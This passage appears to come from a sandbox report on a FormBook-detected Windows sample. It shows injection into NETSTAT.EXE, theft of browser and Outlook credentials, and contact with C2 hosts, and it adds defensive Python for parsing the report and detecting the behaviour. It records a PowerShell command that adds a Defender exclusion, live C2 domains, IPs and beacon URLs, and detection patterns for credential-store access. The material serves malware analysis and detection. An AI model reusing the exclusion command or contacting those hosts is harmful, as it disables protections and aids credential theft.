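        row = re.sub(r"Jump to behavior$", "", raw.strip()).strip()
        if m := RE_PEB.match(row):
            s.peb_reads[m["fn"]] += 1
        elif m := RE_SYSCALL.match(row):
            s.direct_syscalls[m["api"]] += 1
        elif m := RE_CREATED.match(row):
            s.edges.append(("created", ntpath.basename(m["parent"].strip()), ntpath.basename(m["child"])))
            if x := RE_EXCLUSION.search(m["cmd"]):
                s.defender_exclusions.append((x["kind"], x["value"]))
        elif m := RE_SECTION.match(row):
            s.edges.append(("injected", ntpath.basename(m["src"].strip()), ntpath.basename(m["target"])))
        else:
            s.other.append(row)
    return s


def descendants(s: Summary, root: str) -> List[str]:
    """Breadth-first list of every process reached from root over created/injected edges."""
    seen, order, queue = {root}, [], [root]
    while queue:
        cur = queue.pop(0)
        for _, parent, child in s.edges:
            if parent == cur and child not in seen:
                seen.add(child)
                order.append(child)
                queue.append(child)
    return order


SRC = r"C:\Users\user\Desktop\NU1aAbSmCr.exe"
DROPPED = r"C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe"
NETSTAT = r"C:\Windows\SysWOW64\NETSTAT.EXE"
PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"

# Rows copied from this report as rendered (a subset of the full listing).
SAMPLE_ROWS = [
    f"Source: {SRC}Code function: 4_2_015F29A0 mov eax, dword ptr fs:[00000030h]4_2_015F29A0",
] * 3 + [
    f"Source: {SRC}Code function: 4_2_016689B3 mov esi, dword ptr fs:[00000030h]4_2_016689B3",
    f"Source: {SRC}Code function: 4_2_015F2840 mov ecx, dword ptr fs:[00000030h]4_2_015F2840",
    f"Source: {DROPPED}NtProtectVirtualMemory: Direct from: 0x77542F9CJump to behavior",
    f"Source: {DROPPED}NtProtectVirtualMemory: Direct from: 0x77537B2EJump to behavior",
    f"Source: {DROPPED}NtCreateUserProcess: Direct from: 0x7754371CJump to behavior",
    f"Source: {DROPPED}NtWriteVirtualMemory: Direct from: 0x7754490CJump to behavior",
    f"Source: {DROPPED}NtWriteVirtualMemory: Direct from: 0x77542E3CJump to behavior",
    f"Source: {DROPPED}NtMapViewOfSection: Direct from: 0x77542D1CJump to behavior",
    f"Source: {DROPPED}NtResumeThread: Direct from: 0x77542FBCJump to behavior",
    f"Source: {SRC}Section loaded: NULL target: {DROPPED} protection: execute and read and writeJump to behavior",
    f"Source: {SRC}Section loaded: NULL target: {NETSTAT} protection: execute and read and writeJump to behavior",
    f"Source: {NETSTAT}Section loaded: NULL target: C:\\Program Files\\Mozilla Firefox\\firefox.exe protection: execute and read and writeJump to behavior",
    f'Source: {SRC}Process created: {PS} "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" Add-MpPreference -ExclusionPath "{SRC}"Jump to behavior',
    f'Source: {SRC}Process created: {SRC} "{SRC}"Jump to behavior',
    f'Source: {DROPPED}Process created: {NETSTAT} "{NETSTAT}"Jump to behavior',
    f'Source: {NETSTAT}Process created: C:\\Program Files\\Mozilla Firefox\\firefox.exe "C:\\Program Files\\Mozilla Firefox\\Firefox.exe"Jump to behavior',
]

if __name__ == "__main__":
    s = parse_report_rows(SAMPLE_ROWS)
    print("PEB loads per function:", dict(s.peb_reads))
    print("Direct syscalls:", dict(s.direct_syscalls))
    print("Defender exclusions added:", s.defender_exclusions)
    print("Reached from NU1aAbSmCr.exe:", descendants(s, "NU1aAbSmCr.exe"))
```

Two things fall out of the parsed view that the flat list hides: mCFHCvdrqdDiDT.exe is never the child of a "Process created" row in this section, it only appears as the target of a section mapped by NU1aAbSmCr.exe, so the chain is reconstructed from the injection edge rather than from process creation; and the only Defender change is a path exclusion for the sample itself, which on a real host is also recorded by Defender as Event ID 5007 in the Microsoft-Windows-Windows Defender/Operational log.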
            Source: mCFHCvdrqdDiDT.exe, 0000000A.00000002.2580134627.00000000016B1000.00000002.00000001.00040000.00000000.sdmp, mCFHCvdrqdDiDT.exe, 0000000A.00000000.1747506506.00000000016B1000.00000002.00000001.00040000.00000000.sdmp, mCFHCvdrqdDiDT.exe, 0000000E.00000000.1888263847.0000000000BF1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager
            Source: mCFHCvdrqdDiDT.exe, 0000000A.00000002.2580134627.00000000016B1000.00000002.00000001.00040000.00000000.sdmp, mCFHCvdrqdDiDT.exe, 0000000A.00000000.1747506506.00000000016B1000.00000002.00000001.00040000.00000000.sdmp, mCFHCvdrqdDiDT.exe, 0000000E.00000000.1888263847.0000000000BF1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
            Source: mCFHCvdrqdDiDT.exe, 0000000A.00000002.2580134627.00000000016B1000.00000002.00000001.00040000.00000000.sdmp, mCFHCvdrqdDiDT.exe, 0000000A.00000000.1747506506.00000000016B1000.00000002.00000001.00040000.00000000.sdmp, mCFHCvdrqdDiDT.exe, 0000000E.00000000.1888263847.0000000000BF1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
            Source: mCFHCvdrqdDiDT.exe, 0000000A.00000002.2580134627.00000000016B1000.00000002.00000001.00040000.00000000.sdmp, mCFHCvdrqdDiDT.exe, 0000000A.00000000.1747506506.00000000016B1000.00000002.00000001.00040000.00000000.sdmp, mCFHCvdrqdDiDT.exe, 0000000E.00000000.1888263847.0000000000BF1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Queries volume information: C:\Users\user\Desktop\NU1aAbSmCr.exe VolumeInformation
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (5 occurrences)
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation (6 occurrences)
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information

Source: Yara match | File source: 4.2.NU1aAbSmCr.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.NU1aAbSmCr.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.1824100351.0000000003450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.2583578419.00000000049B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2580801626.00000000034E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2581282687.0000000003610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1821048829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1822625318.0000000001950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2578681040.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.2580938292.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\NETSTAT.EXE | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\NETSTAT.EXE | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\NETSTAT.EXE | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\NETSTAT.EXE | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\NETSTAT.EXE | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\NETSTAT.EXE | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\NETSTAT.EXE | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\NETSTAT.EXE | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
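The NETSTAT.EXE rows above are the detection opportunity in this section: a Windows networking utility has no reason to open the Chrome or Edge "Login Data", "Cookies", "Web Data" or "Local State" files, nor the Outlook MAPI profile key, so a process-versus-target mismatch is a hunt that keeps working whichever system binary the injector picks as its host. The Python below is an added example written for this page, not Joe Sandbox code. The Event schema and the sample records are constructed to mirror the rows above, and the allow-lists of browser and mail images are an assumption to tune for your own estate.

```python
"""Flag credential-store access by processes that should never touch those stores.

Added example for this report (not Joe Sandbox code). The Event schema and the
SAMPLE records are constructed; adapt the field mapping to your Sysmon/EDR export.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Images expected to open their own stores (assumption: extend per environment).
BROWSER_IMAGES = {"chrome.exe", "msedge.exe", "firefox.exe"}
MAIL_IMAGES = {"outlook.exe"}

# Chromium credential/cookie stores under '<vendor>\User Data\[<profile>\][Network\]'.
CHROMIUM_STORE_RE = re.compile(
    r"\\(?:Google\\Chrome|Microsoft\\Edge)\\User Data\\(?:[^\\]+\\)?(?:Network\\)?"
    r"(?:Login Data|Cookies|Web Data|Local State)$",
    re.IGNORECASE,
)
# Outlook MAPI profile store: the key this sample opened to find mail accounts.
OUTLOOK_PROFILE_RE = re.compile(
    r"\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\",
    re.IGNORECASE,
)


@dataclass(frozen=True)
class Event:
    image: str   # full path of the acting process
    kind: str    # "file" or "registry"
    target: str  # file path or registry key that was opened


def image_name(path: str) -> str:
    """Basename of a Windows path, lower-cased for allow-list comparison."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(ev: Event) -> Optional[str]:
    """Return a finding label for one event, or None when it looks benign."""
    name = image_name(ev.image)
    if ev.kind == "file" and CHROMIUM_STORE_RE.search(ev.target):
        if name not in BROWSER_IMAGES:
            return "browser-credential-store-access"
    if ev.kind == "registry" and OUTLOOK_PROFILE_RE.search(ev.target):
        if name not in MAIL_IMAGES:
            return "mail-profile-access"
    return None


def findings(events: List[Event]) -> Dict[str, List[Tuple[str, str]]]:
    """Group hits per acting image so one injected host shows up once with all targets."""
    out: Dict[str, List[Tuple[str, str]]] = {}
    for ev in events:
        label = classify(ev)
        if label:
            out.setdefault(ev.image, []).append((label, ev.target))
    return out


# Constructed sample modeled on the observations in this report.
SAMPLE = [
    Event(r"C:\Windows\SysWOW64\NETSTAT.EXE", "file",
          r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    Event(r"C:\Windows\SysWOW64\NETSTAT.EXE", "file",
          r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies"),
    Event(r"C:\Windows\SysWOW64\NETSTAT.EXE", "file",
          r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data"),
    Event(r"C:\Windows\SysWOW64\NETSTAT.EXE", "registry",
          r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion"
          r"\Windows Messaging Subsystem\Profiles\Outlook"),
    # Benign controls: the browser opening its own store, netstat reading hosts.
    Event(r"C:\Program Files\Google\Chrome\Application\chrome.exe", "file",
          r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    Event(r"C:\Windows\SysWOW64\NETSTAT.EXE", "file",
          r"C:\Windows\System32\drivers\etc\hosts"),
]

if __name__ == "__main__":
    for image, hits in findings(SAMPLE).items():
        print(image)
        for label, target in hits:
            print(f"  {label}: {target}")
```

The allow-list is deliberately on the acting image, not on the target, because the target set is stable (Chromium and Outlook store layouts rarely change) while the injected host varies from run to run; a hit on any non-browser image, including signed Windows binaries such as NETSTAT.EXE, is the signal.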

Remote Access Functionality

Source: Yara match | File source: 4.2.NU1aAbSmCr.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.NU1aAbSmCr.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.1824100351.0000000003450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.2583578419.00000000049B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2580801626.00000000034E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2581282687.0000000003610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1821048829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1822625318.0000000001950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2578681040.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.2580938292.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
MITRE ATT&CK Matrix

The count in parentheses after a technique is the number of signatures Joe Sandbox mapped to it in this analysis; techniques without a count are the unmatched cells of the matrix template.

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | DLL Side-Loading (1) | Process Injection (312) | Masquerading (1) | OS Credential Dumping (1) | Security Software Discovery (121) | Remote Services | Email Collection (1) | Encrypted Channel (1) | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Abuse Elevation Control Mechanism (1) | Disable or Modify Tools (11) | LSASS Memory | Process Discovery (2) | Remote Desktop Protocol | Archive Collected Data (1) | Ingress Tool Transfer (3) | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | DLL Side-Loading (1) | Virtualization/Sandbox Evasion (41) | Security Account Manager | Virtualization/Sandbox Evasion (41) | SMB/Windows Admin Shares | Data from Local System (1) | Non-Application Layer Protocol (4) | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Process Injection (312) | NTDS | Application Window Discovery (1) | Distributed Component Object Model | Input Capture | Application Layer Protocol (4) | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information (1) | LSA Secrets | System Network Configuration Discovery (1) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Abuse Elevation Control Mechanism (1) | Cached Domain Credentials | System Network Connections Discovery (1) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Obfuscated Files or Information (4) | DCSync | File and Directory Discovery (2) | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Software Packing (12) | Proc Filesystem | System Information Discovery (113) | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | Timestomp (1) | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | DLL Side-Loading (1) | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
Behavior Graph ID: 1529867 | Sample: NU1aAbSmCr.exe | Start date: 09/10/2024 | Architecture: WINDOWS | Score: 100

Contacted hosts: www.tophm.xyz; www.030002304.xyz; 6 other IPs or domains
Sample-level signatures: Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; Yara detected FormBook; 6 other signatures; Performs DNS queries to domains with low reputation (www.030002304.xyz)

Process tree:
NU1aAbSmCr.exe (started)
    dropped: C:\Users\user\AppData\...\NU1aAbSmCr.exe.log (ASCII)
    signature: Adds a directory exclusion to Windows Defender
    NU1aAbSmCr.exe (started)
        signature: Maps a DLL or memory area into another process
        mCFHCvdrqdDiDT.exe (injected)
            signature: Found direct / indirect Syscall (likely to bypass EDR)
            NETSTAT.EXE (started)
                signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
                mCFHCvdrqdDiDT.exe (injected)
                    network: www.tophm.xyz 199.192.21.169 (NAMECHEAP-NETUS, United States), ports 49993, 49994, 49995; 030002304.xyz 65.21.196.90 (CP-ASDE, United States), ports 49981, 49982, 49983; 3 other IPs or domains
                    signature: Found direct / indirect Syscall (likely to bypass EDR)
                firefox.exe (started)
    powershell.exe (started)
        signature: Loading BitLocker PowerShell Module
        conhost.exe (started)
        WmiPrvSE.exe (started)

Source | Detection | Scanner | Label
NU1aAbSmCr.exe | 66% | ReversingLabs | Win32.Trojan.Leonem
NU1aAbSmCr.exe | 100% | Joe Sandbox ML |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe
https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.tophm.xyz | 199.192.21.169 | true | true | | unknown
newdaydawning.net | 44.213.25.70 | true | false | | unknown
030002304.xyz | 65.21.196.90 | true | true | | unknown
www.coffee-and-blends.info | 217.160.0.231 | true | false | | unknown
kovallo.cloud | 81.2.196.19 | true | false | | unknown
s-part-0032.t-0009.t-msedge.net | 13.107.246.60 | true | false | | unknown
www.030002304.xyz | unknown | unknown | true | | unknown
www.kovallo.cloud | unknown | unknown | true | | unknown
www.newdaydawning.net | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.tophm.xyz/30rz/ | false | | unknown
http://www.tophm.xyz/30rz/?wZBh=UzoT8ph&8T2hn=wd7m4mq4h41P+rN28pyT+ttY7GHVuAvuqtpnERraqOjaWWvMpBvRQDu/0Ra1ptpTEf0KGGfWsjsqje2uOEmu4OBI5eYxRB5JEme+Ix16OOjxqM3SMw== | false | | unknown
http://www.kovallo.cloud/koup/?wZBh=UzoT8ph&8T2hn=zjgQ1IglZSD3j4X7Mb/L9VMKC/lioNLyTiYpIFDypb2XxqZYhzfHyCasu3J1FKt+ikpO665Ej+Wn9KB3IEhbZRsyBSNLju/tAMuqMeNka3iE/L9xhA== | false | | unknown
http://www.coffee-and-blends.info/fhdl/ | false | | unknown
http://www.newdaydawning.net/igaf/?wZBh=UzoT8ph&8T2hn=z7pb/AVrgdjheaZEOJkK38wzdFwtWkfwIJb37ItQC6dYo/jeths6OaqB6aU1oO66EyRWu95qtLC+XaCQo95JR9SCocHD8In7sYhzsBDy4zub0g2aDA== | false | | unknown
http://www.030002304.xyz/6uay/?8T2hn=4t2O3O+pZmQg6Me57d3wJo6heDIGdjpowWW3Ki6AModP/Z3yDnI8KOs9thhsa1jg844M9/RLYM/vwhOiRdypu3qnYIwYUCnWcXg0sNwBl87ACBA0Bg==&wZBh=UzoT8ph | false | | unknown
http://www.coffee-and-blends.info/fhdl/?8T2hn=LZaialQPeltHsffZ/7p0gpt1IPXssyuTEG6qh16Ey8GBHHnvE/VN849lTokelyHAfcJ0dO++uyhAerPT/GlJwSRZaBuTZ4zvU4RSMcEjcessmo3sdA==&wZBh=UzoT8ph | false | | unknown
http://www.030002304.xyz/6uay/ | false | | unknown
http://www.newdaydawning.net/igaf/ | false | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://ac.ecosia.org/autocomplete?q= | NETSTAT.EXE, 0000000B.00000002.2585369147.00000000080B8000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://duckduckgo.com/chrome_newtab | NETSTAT.EXE, 0000000B.00000002.2585369147.00000000080B8000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://duckduckgo.com/ac/?q= | NETSTAT.EXE, 0000000B.00000002.2585369147.00000000080B8000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.tophm.xyz | mCFHCvdrqdDiDT.exe, 0000000E.00000002.2583578419.0000000004A1D000.00000040.80000000.00040000.00000000.sdmp | false | | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | NETSTAT.EXE, 0000000B.00000002.2585369147.00000000080B8000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | NETSTAT.EXE, 0000000B.00000002.2585369147.00000000080B8000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | NETSTAT.EXE, 0000000B.00000002.2585369147.00000000080B8000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.ecosia.org/newtab/ | NETSTAT.EXE, 0000000B.00000002.2585369147.00000000080B8000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | NU1aAbSmCr.exe, 00000000.00000002.1350243310.0000000002A8C000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | NETSTAT.EXE, 0000000B.00000002.2585369147.00000000080B8000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://newdaydawning.net/igaf/?wZBh=UzoT8ph&8T2hn=z7pb/AVrgdjheaZEOJkK38wzdFwtWkfwIJb37ItQC6dYo/jeth | NETSTAT.EXE, 0000000B.00000002.2583392591.00000000045F8000.00000004.10000000.00040000.00000000.sdmp; mCFHCvdrqdDiDT.exe, 0000000E.00000002.2581565135.0000000002C88000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
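The two URL tables above show that every C2 host in this run served the same request template: a four-character directory under the web root, then either nothing (the bare check-in path) or exactly two query parameters, a short token that is identical on all five hosts (wZBh=UzoT8ph) and a long base64-looking blob that differs per request. The Python below is an added example written for this page, not part of the Joe Sandbox report; it clusters proxy-log URLs by that template so that newly registered hosts carrying the same token can be tied to the same configuration. The function names, the "campaign key" notion and the length thresholds are this example's assumptions; the constructed input is copied from the table above plus two benign URLs that sat in the same NETSTAT.EXE memory dump.

```python
"""Cluster beacon URLs by request template (added example, not Joe Sandbox code)."""
import re
from typing import Dict, List, Optional, Tuple
from urllib.parse import urlsplit

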